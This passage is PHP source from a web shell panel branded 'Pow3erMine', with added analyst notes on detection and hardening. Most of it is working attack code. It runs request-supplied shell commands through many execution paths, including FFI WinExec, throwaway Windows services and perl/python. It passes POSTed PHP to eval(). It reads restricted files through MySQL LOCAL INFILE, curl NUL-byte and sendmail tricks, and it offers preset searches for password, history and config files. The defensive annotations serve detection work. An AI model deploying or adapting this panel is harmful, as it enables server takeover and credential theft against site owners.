  // Detection/hardening: database audit logs showing CREATE DATABASE a / DROP
  // DATABASE a from the web application account; local_infile disabled on server and
  // client; web application accounts without CREATE or GRANT privileges.
  609. function MySQLReader($path) {
  610. global $DBhost,$DBuser,$DBpass;
  611. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  612. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  613. mysql_query("CREATE DATABASE a");
  614. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  615. mysql_query("GRANT SELECT,INSERT ON a.a TO '".$DBuser."'");
  616. mysql_query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a") or die(mysql_error());
  617. $result = mysql_query("SELECT a FROM a.a");
  618. while(list($row) = mysql_fetch_row($result)){print $row . chr(10);}
  619. mysql_query("DROP DATABASE a");
  620. }
  // mysqli variant of MySQLReader(): creates database `a` and table `a.a` over the
  // legacy mysql_* connection, then opens a mysqli connection with LOCAL INFILE
  // enabled and a local-infile handler r() that prints whatever it reads from the
  // file handle. The database is not dropped afterwards in this variant. $path is
  // concatenated into the SQL text. Returns nothing; output is printed directly.
  621. function MySQLIReader($path) {
  622. global $DBhost,$DBuser,$DBpass;
  623. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  624. $con = mysql_connect($DBhost,$DBuser,$DBpass);
  625. mysql_query("CREATE DATABASE a");
  626. mysql_query("CREATE TABLE a.a (a varchar(1024))");
  627.  
  // Declared inside the function body, so r() becomes a global function the first
  // time MySQLIReader() runs.
  628. function r($fp, &$buf, $len, &$err) {
  629. print fread($fp, $len);
  630. }
  631. $m = new mysqli($DBhost, $DBuser, $DBpass, 'a');
  632. $m->options(MYSQLI_OPT_LOCAL_INFILE, 1);
  633. $m->set_local_infile_handler("r");
  634. $m->query("LOAD DATA LOCAL INFILE '".$path."' INTO TABLE a.a");
  635. $m->close();
  636. }
  // Opens a persistent legacy mysql_* connection and selects $db. Returns true on
  // success and false on failure; the second `return $connect` is never reached.
  // On connection failure the host, user and password are echoed into the page.
  637. function DBConnect($host,$user,$pass,$db) {
  638. $connect = mysql_pconnect($host,$user,$pass);
  639. if(!$connect){echo "Can't Connect to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; }
  640. else {
  641. $tryToSelectDB = mysql_select_db($db,$connect);
  642. if(!$tryToSelectDB){echo "Can't Enter The Database [ ".$db." ]"; return false; }
  643. else{return true; return $connect;}
  644. }
  645. }
  // Account enumeration through the POSIX extension: asks posix_getpwuid() for every
  // UID from 0 to 59999 and concatenates the fields of each entry found. $path is
  // not used. `eah` is not defined in the visible part of the file.
  646. function ReadId($path) {
  647. for($uid=0;$uid<60000;$uid++) {
  648. $ara = posix_getpwuid($uid);
  649. if (!empty($ara)){while (list ($key, $val) = eah($ara)){$content .= $val;}
  650. }
  651. }
  652. return $content;
  653. }
  // Reads through the IMAP extension: $path is passed as the mailbox argument of
  // imap_open() with empty credentials, and the body of message 1 is returned.
  // Hardening note: this path does not exist when the imap extension is not loaded.
  654. function ImapF($path) {
  655. $stream = imap_open($path, "", "");
  656. $str = imap_body($stream, 1);
  657. imap_close($stream);
  658. return $str;
  659. }
  // Reads $path with file() and returns the lines concatenated into one string.
  660. function FileF($path) {
  661. $lines = file($path); foreach($lines as $line){$content .= $line;}
  662. return $content;
  663. }
  // Reads $path by copying it to a temp file named md5(uniqid()) + ".bb" in the
  // current directory, reading the copy, deleting it and returning the contents.
  // Indicator: short-lived 32-hex-character *.bb files in the web directory.
  664. function CopyF($path) {
  665. $tempFile = md5(uniqid()).".bb";
  666. copy($path,$tempFile);
  667. $content = file_get_contents($tempFile);
  668. unlink($tempFile);
  669. return $content;
  670. }
  // Concatenates lines returned by fgetss() until it yields a falsy value. $path is
  // handed to fgetss() directly rather than an opened handle. fgetss() was removed
  // in PHP 8.0.
  671. function fgetssF($path) {
  672. while(($line = fgetss($path)) != false){$content .= $line;}
  673. return $content;
  674. }
  // Thin wrapper: returns the result of highlight_file($path). Without the second
  // argument highlight_file() prints the highlighted source itself.
  675. function highlightFile($path) {
  676. return highlight_file($path);
  677. }
  // Reads through the mail transport: builds an additional-parameters string that
  // names $path as the MTA configuration file (-C) and a uniqid()-named file in the
  // current directory as the MTA log (-X), calls mb_send_mail() with it, then reads
  // the log file back, deletes it and returns the contents. Returns nothing when
  // mb_send_mail() is unavailable.
  // Hardening note: listing the mail functions in disable_functions on hosts that
  // do not send mail from PHP removes this path; unexpected sendmail invocations
  // spawned by the PHP worker carrying -C/-X arguments are a detection signal.
  678. function mbSendEmail($path) {
  679. if(function_exists('mb_send_mail')) {
  680. $tempFile = uniqid();
  681. $additional_param = "-C ".$path." -X ".getcwd()."/".$tempFile;
  682. mb_send_mail("email@example.com", NULL, NULL, NULL, $additional_param);
  683. $content = file_get_contents($tempFile);
  684. unlink($tempFile);
  685. return $content;
  686. }
  687. }
  // Deletes $fileName with unlink(); if that did not succeed, falls back to a shell
  // command through Exe() (`del` on Windows, `rm -f` on Linux, chosen from the
  // global $os). $fileName is interpolated into the command line without escaping.
  // Returns true or false.
  688. function DeleteFile($fileName) {
  689. global $os;
  690. if(function_exists('unlink'))
  691. {$delete = unlink($fileName);}
  692. if((!$delete) && ($os == 'Windows'))
  693. {$delete = Exe("del $fileName"); }
  694. else if((!$delete) && ($os == 'Linux'))
  695. {$delete = Exe("rm -f $fileName");}
  696. if($delete){return true;}else{return false;}
  697. }
  // Reads through the cURL extension: requests a file:// URL built from $path, a NUL
  // byte and this script's own path, and var_dump()s the result. The embedded NUL
  // presumably targets path checks in old PHP/libcurl builds — verify against the
  // PHP version in use. Returns nothing.
  // Hardening note: current PHP releases and not loading the curl extension where it
  // is not needed both close this path.
  698. function CurlFileRead($path) {
  699. $ch = curl_init("file://".$path."\x00".__FILE__);
  700. var_dump(curl_exec($ch));
  701. }
  // Opens $path read/write and calls fread() on it; the escaped result is neither
  // stored, echoed nor returned. filesize() is given the handle rather than the
  // path. Not referenced by the dispatcher in the visible part of the file.
  702. function FReadF($path) {
  703. $file = fopen($path,'r+'); //Open The File
  704. if(function_exists('fread')){htmlspecialchars(fread($file,filesize($file)));}
  705. fclose($file);
  706. }
  // Reads $path through the compress.zlib:// stream wrapper: copies it to a
  // tempnam() file (prefix "cx") in the global $dir, reads the copy, deletes it and
  // returns the HTML-escaped contents with line breaks converted. $filename is
  // never assigned in this function. Returns nothing when the copy fails.
  // Indicator: short-lived files with a "cx" prefix in the working directory.
  707. function TempnameF($path) {
  708. global $dir;
  709. $temp = tempnam($dir, "cx");
  710. if(copy("compress.zlib://".$path, $temp)) {
  711. $handler = fopen($temp, "r");
  712. $readFile = fread($handler, @filesize($temp));
  713. fclose($handler);
  714. $content .= htmlspecialchars($filename);
  715. $content .= nl2br(htmlspecialchars($readFile));
  716. $content .= htmlspecialchars($filename);
  717. unlink($temp);
  718. return $content;
  719. }
  720. }
  // Strips PHP open/close tags from $eval and passes the rest to eval(). Returns
  // true when eval() yields a truthy value, false otherwise.
  // NOTE(review): the only caller visible here feeds it the POSTed PHP_Line field,
  // i.e. request data reaches eval() directly.
  721. function Evaluation($eval) {
  722. $eval = str_replace(array("<?php","<?","?>"),"",$eval);
  723. $eval = eval($eval);
  724. if($eval){return true;}else{return false;}
  725. }
  // Status cell for the info table: red "ON" when ocilogon() exists, green "OFF" otherwise.
  726. function Oracle() {
  727. if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';}
  728. else {$oracle = '<font color="green">OFF</font>';}return $oracle;
  729. }
  // Status cell: red "ON" when mssql_connect() exists, green "OFF" otherwise.
  730. function MsSQL() {
  731. if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';}
  732. else {$msSQL = '<font color="green">OFF</font>';}return $msSQL;
  733. }
  // Status cell: red "ON" when the legacy mysql_connect() exists, green "OFF" otherwise.
  734. function MySQL2() {
  735. $mysql_try = function_exists('mysql_connect');
  736. if($mysql_try){$mysql = '<font color="red">ON</font>';}
  737. else {$mysql = '<font color="green">OFF</font>';}return $mysql;
  738. }
  // Status cell: red "ON" when msql_connect() exists, green "OFF" otherwise.
  739. function MSQL() {
  740. if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';}
  741. else {$mSql = '<font color="green">OFF</font>';}return $mSql;
  742. }
  // Status cell: red "ON" when mysqli_connect() exists, green "OFF" otherwise.
  743. function MysqlI() {
  744. if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';}
  745. else {$mysqli = '<font color="green">OFF</font>';}return $mysqli;
  746. }
  // Status cell: red "ON" when gzencode() exists, green "OFF" otherwise.
  747. function Gzip() {
  748. if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';}
  749. else {$gzip = '<font color="green">OFF</font>';}return $gzip;
  750. }
  // Status cell for the open_basedir setting: green "OFF" when the ini value is
  // empty, red "ON" when a restriction is configured. The colours follow the
  // operator's point of view, so an active protection is shown in red.
  751. function openBaseDir() {
  752. $openBaseDir = ini_get("open_basedir");
  753. if (!$openBaseDir){$openBaseDir = '<font color="green">OFF</font>';}
  754. else {$openBaseDir = '<font color="red">ON</font>';}
  755. return $openBaseDir;
  756. }
  // Status cell: red "ON" when the curl extension is loaded, green "OFF" otherwise.
  757. function Curl() {
  758. if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';}
  759. else{$curl = '<font color="green">OFF</font>';}return $curl;
  760. }
  // Status cell for magic_quotes_gpc: green "OFF" when get_magic_quotes_gpc() is
  // missing or returns an empty value, red "ON" otherwise.
  761. function magicQouts() {
  762. if(function_exists('get_magic_quotes_gpc')){$mag = get_magic_quotes_gpc();}
  763. if (empty($mag)){$mag = '<font color="green">OFF</font>';}
  764. else {$mag= '<font color="red">ON</font>';}return $mag;
  765. }
  // Status cell for the safe_mode ini setting: green "OFF" when empty, red "ON"
  // when set. safe_mode exists only in PHP 5.3 and earlier.
  766. function SafeMode() {
  767. $safe_mode = ini_get("safe_mode");
  768. if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';}
  769. else {$safe_mode = '<font color="red">ON</font>';}
  770. return $safe_mode;
  771. }
  // Returns the raw disable_functions ini value (a comma-separated list), or a green
  // "NONE" HTML snippet when the list is empty. The caller splits the result on
  // commas to fill a select box, so the host's hardening list is shown to the operator.
  772. function DisableFunctions() {
  773. $disfun = ini_get('disable_functions');
  774. if (empty($disfun)){$disfun = '<font color="green">NONE</font>';}return $disfun;
  775. }
  // Status cell for register_globals: red "ON" when the ini value is truthy, green
  // "OFF" otherwise.
  776. function RegisterGlobals() {
  777. if(ini_get('register_globals')){$registerg= '<font color="red">ON</font>';}
  778. else{$registerg= '<font color="green">OFF</font>';}return $registerg;
  779. }
  // Returns the client address, preferring the X-Forwarded-For and Client-IP request
  // headers over REMOTE_ADDR. Both headers are client-controlled, and the callers
  // visible in this file echo the value into HTML without escaping. The environment
  // names are written as bare constants rather than quoted strings.
  780. function GetRealIP() {
  781. if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);}
  782. elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);}
  783. else {$ip=getenv(REMOTE_ADDR);}
  784. return $ip;
  785. }
/**
 * Echoes an HTML <select> of preset commands for the command-line form.
 *
 * The `global $os` statement rebinds $os to the script-level variable, so the
 * argument passed by the caller is not what selects the list. "Windows" gets a
 * short set of host/network enumeration commands; anything else gets the
 * Unix list.
 *
 * Analyst notes: the presets are reconnaissance only (listing setuid/setgid and
 * world-writable files, locating configuration, password and shell-history
 * files, showing listening ports). They indicate what an operator of this panel
 * looks for first: credentials in config files, .htpasswd, .bash_history and
 * .mysql_history should be treated as exposed on a host where this file was
 * reachable. The literal option strings are stable and suitable for static
 * signature matching.
 *
 * @param mixed $os Overridden by the global of the same name (see above).
 * @return void Output is written directly with echo.
 */
function SelectCommand($os) {
global $os;
if($os == 'Windows') {
echo "
<select name='alias' id='alias' onChange='AddAlias();' >
<option value=''>NONE</option>
<option value='dir' >List Directory</option>
<option value='dir /s /w /b index.php'>Find index.php in current dir</option>
<option value='dir /s /w /b *config*.php'>Find *config*.php in current dir &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;</option>
<option value='netstat -an'>Show active connections</option>
<option value='net start'>Show running services</option>
<option value='tasklist'>Show Pro</option>
<option value='net user'>User accounts</option>
<option value='net view'>Show computers</option>
<option value='arp -a'>ARP Table</option>
<option value='ipconfig /all'>IP Configuration</option>
<option value='netstat -an'>netstat -an</option>
<option value='systeminfo'>System Informations</option>
<option value='getmac'>Get Mac Address</option>
</select>
";
}
else {
echo "
<select name='alias' id='alias' onChange='AddAlias();' >
<option value=''>NONE</option>
<option value='ls -la'>List dir</option>
<option value='cat /etc/hosts'>IP Addresses</option>
<option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
<option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
<option value='netstat -an | grep -i listen'>show opened ports</option>
<option value='find / -type f -perm -04000 -ls'>find all suid files</option>
<option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
<option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
<option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
<option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
<option value='find / -type f -name \"config*\"'>find config* files</option>
<option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
<option value='find / -perm -2 -ls'>find all writable folders and files</option>
<option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
<option value='find / -type f -name service.pwd'>find all service.pwd files</option>
<option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
<option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
<option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
<option value='find / -type f -name .bash_history'>find all .bash_history files</option>
<option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
<option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
<option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
<option value='locate httpd.conf'>locate httpd.conf files</option>
<option value='locate vhosts.conf'>locate vhosts.conf files</option>
<option value='locate proftpd.conf'>locate proftpd.conf files</option>
<option value='locate psybnc.conf'>locate psybnc.conf files</option>
<option value='locate my.conf'>locate my.conf files</option>
<option value='locate admin.php'>locate admin.php files</option>
<option value='locate cfg.php'>locate cfg.php files</option>
<option value='locate conf.php'>locate conf.php files</option>
<option value='locate config.dat'>locate config.dat files</option>
<option value='locate config.php'>locate config.php files</option>
<option value='locate config.inc'>locate config.inc files</option>
<option value='locate config.inc.php'>locate config.inc.php</option>
<option value='locate config.default.php'>locate config.default.php files</option>
<option value='locate config'>locate config* files </option>
<option value='locate \".conf\"'>locate .conf files</option>
<option value='locate \".pwd\"'>locate .pwd files</option>
<option value='locate \".sql\"'>locate .sql files</option>
<option value='locate \".htpasswd\"'>locate .htpasswd files</option>
<option value='locate \".bash_history\"'>locate .bash_history files</option>
<option value='locate \".mysql_history\"'>locate .mysql_history files</option>
<option value='locate \".fetchmailrc\"'>locate .fetchmailrc files</option>
<option value='locate backup'>locate backup files</option>
<option value='locate dump'>locate dump files</option>
<option value='locate priv'>locate priv files</option>
</select>
";
}
}
/**
 * Builds the panel's inline <style> and <script> block and returns it as a string.
 *
 * $sh3llColor is concatenated into the stylesheet unescaped; in this file it comes
 * from a hard-coded configuration variable. The script part defines four
 * browser-side helpers: openPHPInfo() opens "?info=getPhpInfo" in a popup,
 * AddAlias() copies the preset dropdown value into the CMD_Line field,
 * addUploadInput() appends another file input, and change_dir_mode() reloads the
 * page with a dir_mode query parameter.
 *
 * Analyst note: nothing here executes server-side actions, but the element ids
 * and function names (CMD_Line, alias, uploadInput, openPHPInfo) are stable
 * strings that help identify this panel family in file scans.
 *
 * @param string $sh3llColor CSS colour value used for accents and links.
 * @return string The <style>…</style><script>…</script> markup.
 */
function CSS($sh3llColor) {
$css = "
<style>
BODY
{
FONT-FAMILY: Verdana;
margin: 2;
background-color: #000000;
color:white;
font-size:10pt;
}
sy
{
color:".$sh3llColor.";
font-size:7pt;
}
#Box
{
color:".$sh3llColor.";
background-color:#000;
font-size:14px;
font-weight:bold;

border:none;
}
table
{
border:none;
BORDER: #eeeeee outset;
BACKGROUND-COLOR: #000000;
color: #cccccc;
font-size:10px;
}
tr
{
BORDER-RIGHT: #cccccc 1px solid;
BORDER-TOP: #cccccc 1px solid;
BORDER-LEFT: #cccccc 1px solid;
BORDER-BOTTOM: #cccccc 1px solid;
color: #ffffff;
}
td
{
BORDER-RIGHT: #cccccc 1px solid;
BORDER-TOP: #cccccc 1px solid;
BORDER-LEFT: #cccccc 1px solid;
BORDER-BOTTOM: #cccccc 1px solid;
color: #cccccc;
}

input
{
BORDER-RIGHT: ".$sh3llColor." 1px solid;
BORDER-TOP: ".$sh3llColor." 1px solid;
BORDER-LEFT: ".$sh3llColor." 1px solid;
BORDER-BOTTOM: ".$sh3llColor." 1px solid;
BACKGROUND-COLOR: #333333;
font: 9pt tahoma;
color: #ffffff;
}
select
{
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #000000;
font: 9pt tahoma;
color: #CCCCCC;;
}
submit
{
BORDER: 1px outset buttonhighlight;
BACKGROUND-COLOR: #272727;
width: 40%;
color: #cccccc;
}
textarea
{
BORDER-RIGHT: #ffffff 1px solid;
BORDER-TOP: #999999 1px solid;
BORDER-LEFT: #999999 1px solid;
BORDER-BOTTOM: #ffffff 1px solid;
BACKGROUND-COLOR: #333333;
color: #ffffff;
}
.Save{
width:500px;
border-color:red;
}
A:link {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
A:visited { COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
A:active {COLOR:".$sh3llColor."; TEXT-DECORATION: none;}
A:hover {color:blue;TEXT-DECORATION: none;}
</style>
<script>
function openPHPInfo(){my_window= window.open (\"?info=getPhpInfo\",\"PHP Info\",\"width=800,height=600,scrollbars=1\"); }
function AddAlias(){document.getElementById('CMD_Line').value = document.getElementById('alias').value; }
function addUploadInput(){document.getElementById('uploadInput').innerHTML += '<input type=\'file\' name=\'uploadfile[]\'>'; }
function change_dir_mode() {
var dir_mode = document.getElementById('dir_mode').value;
document.location = '?dir_mode='+dir_mode;
}
</script>
";
return $css;
}
/**
 * Undoes magic-quotes escaping on a request value; it does not sanitise anything.
 *
 * Despite the name, this only calls stripslashes() when get_magic_quotes_gpc()
 * reports a non-zero value, and otherwise returns the input unchanged. Every
 * call site that wraps request data in filter() therefore passes the raw,
 * caller-controlled value on to file, socket and command functions.
 *
 * NOTE(review): unlike magicQouts(), this calls get_magic_quotes_gpc() without a
 * function_exists() guard.
 *
 * @param string $string Value taken from the request.
 * @return string The value with slashes stripped, or unchanged.
 */
function filter($string) {
if(get_magic_quotes_gpc() != 0){return stripslashes($string); }
else{return $string; }
}
/**
 * Echoes the closing table, branding line and </body></html> tags.
 *
 * There is no return statement; all output is written with echo.
 *
 * Analyst note: the branding and contact strings below are fixed text and are
 * useful as static signatures when sweeping a web root for copies of this file.
 *
 * @return void
 */
function footer() {
echo '
<table width="100%">
<tr>
<td width="100%"><center>
<sy> ? </sy>Copyright © 2002-2014 Pow3erMine - All rights reserved.<sy> ?</sy></b><br/>

<sy> ? </sy>Skype: Pow3rMine | Email: onlinestresser@gmail.com<sy> ?</sy></b>
</center></td>
</tr>
</table>
</body></html>
';
}
/**
 * Emits the "exe_method" <select> that chooses which execution primitive Exe() uses.
 *
 * Reads the globals $os and $exec_method. The option matching $exec_method is
 * marked selected. The "Linux" list offers the PHP process functions plus perl
 * and python; the other list adds Windows-specific entries.
 *
 * Analyst note: the option values enumerate every execution path this panel
 * tries, which maps directly onto a hardening checklist: the PHP functions of
 * the same names are candidates for disable_functions, and the perl, python,
 * ffi, win_shell_execute and win32_create_service entries depend on optional
 * extensions that a production web server rarely needs loaded.
 *
 * @return void Markup is written directly to the output.
 */
function print_exe_method() {
global $os; global $exec_method;
if($os == "Linux") {
?>
<select name="exe_method" >
<option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
<option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system</option>
<option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec</option>
<option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
<option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
<option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
<option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
<option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
</select>
<?php
} else {
?>
<select name="exe_method" >
<option value="exec" <?php if($exec_method == "exec") {echo "selected";} ?>>exec()</option>
<option value="system" <?php if($exec_method == "system") {echo "selected";} ?>>system()</option>
<option value="shell_exec" <?php if($exec_method == "shell_exec") {echo "selected";} ?>>shell_exec()</option>
<option value="passthru" <?php if($exec_method == "passthru") {echo "selected";} ?>>passthru()</option>
<option value="proc_open" <?php if($exec_method == "proc_open") {echo "selected";} ?>>proc_open()</option>
<option value="popen" <?php if($exec_method == "popen") {echo "selected";} ?>>popen()</option>
<option value="win_shell_execute" <?php if($exec_method == "win_shell_execute") {echo "selected";} ?>>win_shell_execute()</option>
<option value="win32_create_service" <?php if($exec_method == "win32_create_service") {echo "selected";} ?>>win32_create_service()</option>
<option value="ffi" <?php if($exec_method == "ffi") {echo "selected";} ?>>ffi</option>
<option value="perl" <?php if($exec_method == "perl") {echo "selected";} ?>>perl</option>
<option value="python" <?php if($exec_method == "python") {echo "selected";} ?>>python</option>
<option value="slash_bypass <?php if($exec_method == "slash_bypass") {echo "selected";} ?>">slash bypass</option>
</select>
<?php
}
}
/**
 * Central command dispatcher: runs $command through the primitive named by the
 * global $exec_method and writes the output to the response.
 *
 * $command passes through filter() only, which strips magic-quote slashes and
 * does no validation, so the string reaches the operating system as submitted.
 * $exec_method is itself taken from the request elsewhere in the file. An
 * unrecognised method name matches no branch and nothing runs.
 *
 * Analyst notes:
 *  - Every branch ends in a child process of the web server / PHP worker. Process
 *    lineage (the PHP or web server account spawning a shell or cmd.exe) is the
 *    most reliable runtime detection for this whole function.
 *  - The perl and python branches build interpreter source by string
 *    concatenation around $command.
 *  - Denying the listed PHP functions via disable_functions and not loading the
 *    optional extensions removes these paths; it does not remove the file write
 *    and read features elsewhere in the panel.
 *
 * @param string $command Command line taken from the request.
 * @return void Output is echoed or passed through directly.
 */
function Exe($command) {
global $dir;global $os;global $exec_method;
$command = filter($command);

if($exec_method == "exec") {
exec($command,$output);echo join("\n",$output);
} else if($exec_method == "system") {
system($command);
} else if($exec_method == "shell_exec") {
echo shell_exec($command);
} else if($exec_method == "passthru") {
passthru($command);
} else if($exec_method == "proc_open") {
echo proc_exec($command,$dir);
} else if($exec_method == "popen") {
$fp = popen($command,"r");{while(!feof($fp)){$result.=fread($fp,1024);}pclose($fp);}echo convert_cyr_string($result,"d","w");
} else if($exec_method == "win_shell_execute") {
echo winshell($command);
} else if($exec_method == "win32_create_service") {
echo srvshell($command);
} else if($exec_method == "ffi") {
echo ffishell($command);
} else if($exec_method == "perl") {
echo perlshell($command);
} else if($exec_method == "python") {
echo python_eval("import os\nos.system('".$command."')");
} else if($exec_method == "slash_bypass") {
echo slashBypass($command);
}
}
/**
 * Runs $com with proc_open() in working directory $dir and returns its stdout.
 *
 * The process handle and pipes are not closed here. Only descriptor 1 is read.
 *
 * @param string $com Command line, passed to proc_open() as given.
 * @param string $dir Working directory for the child process.
 * @return string|false Contents read from the child's stdout pipe.
 */
function proc_exec($com , $dir) {
$start_pipe=array(0=>array("pipe","w"),1=>array("pipe","w"));
$process=proc_open($com,$start_pipe,$pipes,$dir,NULL);
return stream_get_contents($pipes[1]);
}
/**
 * Windows execution path via win_shell_execute(): runs the command under
 * cmd.exe with output redirected to a temp file, then reads and deletes it.
 *
 * Analyst note: the redirect target is whereistmP() (defined elsewhere in the
 * file) plus a uniqid() name with the fixed prefix "NJ". Short-lived files with
 * that prefix in the temp directory, and cmd.exe launched with "/C ... >" by the
 * PHP worker, are the observable artefacts.
 *
 * @param string $command Command line interpolated into the cmd.exe arguments.
 * @return string|false Captured output read back from the temp file.
 */
function winshell($command) {
$name=whereistmP()."\\".uniqid('NJ');
win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
// Fixed one-second wait for the child to finish writing before the file is read.
sleep(1);
$exec=file_get_contents($name);
DeleteFile($name);
return $exec;
}
/**
 * Windows execution path via the win32service functions: registers a throwaway
 * service whose binary is cmd.exe, starts it, then stops and deletes it.
 *
 * Analyst note: the service name and display name are a uniqid() value with the
 * fixed prefix "NJ", and the service parameters redirect output to a temp file
 * with the same prefix. Service-creation events for such names, with a command
 * interpreter as the service binary and created by the web application account,
 * are a high-signal detection. The create/start/stop/delete sequence happens
 * back to back, so the service itself is short-lived.
 *
 * @param string $command Command line interpolated into the service parameters.
 * @return string|false Captured output read back from the temp file.
 */
function srvshell($command) {
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
// Falls back to a hard-coded interpreter path when ComSpec is not present in $_SERVER.
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
// Polls once per second with no upper bound until the output file appears.
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
DeleteFile($name);
return $exec;
}
/**
 * Windows execution path via an FFI binding to kernel32!WinExec.
 *
 * Output is redirected to a temp file named with the fixed "NJ" uniqid() prefix,
 * which is then read and deleted. This path bypasses PHP's own process
 * functions entirely, so disable_functions alone does not cover it; it depends
 * on the ffi extension being loaded.
 *
 * @param string $command Command line interpolated into the WinExec argument.
 * @return string|false Captured output read back from the temp file.
 */
function ffishell($command) {
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
// Polls once per second with no upper bound until the output file appears.
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
DeleteFile($name);
return $exec;
}
/**
 * Execution path via the PHP perl extension: evaluates a Perl system() call and
 * returns whatever was written to the output buffer.
 *
 * $command is concatenated into Perl source between single quotes with no
 * escaping. Depends on the perl extension being loaded.
 *
 * @param string $command Command line concatenated into the Perl snippet.
 * @return string|false Buffered output captured during the eval.
 */
function perlshell($command) {
$perl=new perl();
ob_start();
$perl->eval("system('".$command."')");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
/**
 * Windows execution path that goes through a batch file in the current directory.
 *
 * Writes "cmd.bat" containing the command with output redirected to "sy3.txt",
 * launches it through exec(), then reads and removes sy3.txt. cmd.bat itself is
 * not removed here.
 *
 * Analyst note: a leftover cmd.bat in a web-served directory, and transient
 * sy3.txt files, are file-system artefacts of this path.
 *
 * @param string $cmd Command line written into the batch file.
 * @return string|false Contents of sy3.txt.
 */
function slashBypass($cmd) {
GenerateFile("cmd.bat","$cmd>sy3.txt"."\r\n exit");
exec("\start cmd.bat");
$content = file_get_contents('sy3.txt');
unlink('sy3.txt');
return $content;
}
/**
 * Creates or truncates $name (mode "w+") and writes $content to it.
 *
 * This is the panel's single file-write primitive: the visible callers use it
 * to save edited files and to drop php.ini, .htaccess and cmd.bat into the
 * current directory. $name is used as given, with no path restriction.
 *
 * The write function is chosen by availability (fwrite, then fputs, then
 * file_put_contents), which looks intended to cope with individual functions
 * being disabled. A falsy write result, including zero bytes written, is
 * reported as failure. When fopen or fclose is not defined the function falls
 * through without an explicit return value.
 *
 * @param string $name    Target path, relative paths resolve against the cwd.
 * @param string $content Bytes to write.
 * @return bool|null true on success, false when the open or write fails.
 */
function GenerateFile($name,$content) {
if(function_exists('fopen') && function_exists('fclose')) {
$file = fopen($name,"w+");
if($file) {
if(function_exists('fwrite')){$writeFile = fwrite($file,$content); }
else if (function_exists('fputs')){$writeFile = fputs($file,$content); }
else if (function_exists('file_put_contents')){$writeFile = file_put_contents($file,$content);}
if(!$writeFile){return false;}
}
else{return false;}fclose($file);return true;
}
}
/**
 * Produces the directory listing shown in the result textarea.
 *
 * Two modes, selected by the global $dir_mode:
 *  - "cmd": delegates to Exe() with "dir" or "ls -lia", which prints the listing
 *    itself; nothing is appended to $result in this mode.
 *  - otherwise: walks $dir with opendir()/readdir() and builds a text table of
 *    permissions, size, ctime, owner/group ids, readable/writable flags and type.
 *    This mode uses only PHP file functions, so it still works when the
 *    process-execution functions are disabled.
 *
 * The stat calls are made on the bare entry name, so they resolve against the
 * process working directory rather than $dir. The directory handle is not closed.
 *
 * @return string|null The text table in PHP mode.
 */
function ScanDirs() {
global $os; global $dir;global $safeMode;global $dir_mode;
if($dir_mode == "cmd"){if($os == "Windows"){Exe('dir');}else{ Exe('ls -lia');}}
else {
$result .= "Perms Size Time Owner/Group R/W Type File
-----------------------------------------------------------------------------
";
$handel = opendir($dir);
while(($file = readdir($handel))!= false)
{
$size = filesize($file);
if(filetype($file) == "dir"){$type = "<DIR>";}else {$type = "<FILE>";}
if(fileowner($file)){$owner = fileowner($file);}else{$owner = "NONE";}
if(filegroup($file)){$group = filegroup($file);}else{$group = "NONE";}
$perms = fileperms($file);
